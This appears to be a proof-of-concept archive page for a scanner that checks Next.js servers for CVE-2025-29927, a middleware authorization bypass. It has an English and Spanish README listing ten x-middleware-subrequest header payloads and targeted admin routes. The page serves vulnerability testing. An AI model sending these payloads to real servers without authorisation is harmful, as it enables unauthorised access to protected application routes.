Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Este script verifica la vulnerabilidad CVE-2025-29927 en servidores Next.js, probando múltiples cargas en la cabecera x-middleware-subrequest para detectar accesos no autorizados.
Readme
CVE-2025-29927 Checker
📌 Introduction
This script checks for the CVE-2025-29927 vulnerability in Next.js servers by testing multiple payloads in the x-middleware-subrequest header to detect unauthorized access.
❓ What is CVE-2025-29927?
CVE-2025-29927 is a vulnerability that allows security restrictions in Next.js to be bypassed, granting access to sensitive routes without authentication.
⚙️ How the Script Works
🔹 1. Importing Libraries
The script uses:
🛠️ argparse - for argument handling.
🌐 requests - to send HTTP requests.
⏳ time - for pauses between tests.
🎨 colorama - to format console output with colors.
🔹 2. Payload List
The script tests multiple payloads in x-middleware-subrequest, designed to bypass security restrictions. Example:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Sensitive Routes
The script analyzes responses for paths such as:
/admin, /dashboard, /settings, /private, /config
🔹 4. Scanning Process
✅ Displays a banner in the console.✅ Sends HTTP requests with different payloads.✅ Checks if the server uses Next.js.✅ Detects access to sensitive routes and reports vulnerabilities.
🔹 5. Error Handling
The script handles exceptions to prevent interruptions due to connection failures.
🚀 Usage Example
Run the script with:
python script.py -t https://example.com/api/auth
📢 Disclaimer
This tool is for ethical testing and authorized use only. Unauthorized use against third-party systems is illegal.
===================ESPAÑOL===================
CVE-2025-29927 Checker
📌 Introducción
Este script verifica la vulnerabilidad CVE-2025-29927 en servidores Next.js, probando múltiples payloads en el encabezado x-middleware-subrequest para detectar accesos no autorizados.
❓ ¿Qué es CVE-2025-29927?
CVE-2025-29927 es una vulnerabilidad que permite eludir restricciones de seguridad en Next.js, otorgando acceso a rutas sensibles sin autenticación.
⚙️ Cómo Funciona el Script
🔹 1. Importación de Librerías
El script utiliza:
🛠️ argparse - para el manejo de argumentos.
🌐 requests - para enviar solicitudes HTTP.
⏳ time - para pausas entre pruebas.
🎨 colorama - para formatear la salida en la consola con colores.
🔹 2. Lista de Payloads
El script prueba múltiples payloads en x-middleware-subrequest, diseñados para evadir restricciones de seguridad. Ejemplo:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Rutas Sensibles
El script analiza las respuestas en busca de rutas como:
/admin, /dashboard, /settings, /private, /config
🔹 4. Proceso de Escaneo
✅ Muestra un banner en la consola.✅ Envía solicitudes HTTP con diferentes payloads.✅ Verifica si el servidor usa Next.js.✅ Detecta accesos a rutas sensibles e informa vulnerabilidades.
🔹 5. Manejo de Errores
El script maneja excepciones para evitar interrupciones debido a fallos de conexión.
🚀 Ejemplo de Uso
Ejecutar el script con:
python script.py -t https://example.com/api/auth
📢 Aviso Legal
Esta herramienta es para pruebas éticas y uso autorizado únicamente. El uso no autorizado en sistemas de terceros es ilegal.
File Snapshot
[4.0K] /data/pocs/3c3fadb81e638452a2222bd830de8042ca55a996
├── [3.3K] CVE-2025-29927_Scanner.py
├── [ 60K] demo_localhost.png
├── [ 20K] demo_real.png
└── [4.7K] README.md
0 directories, 4 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →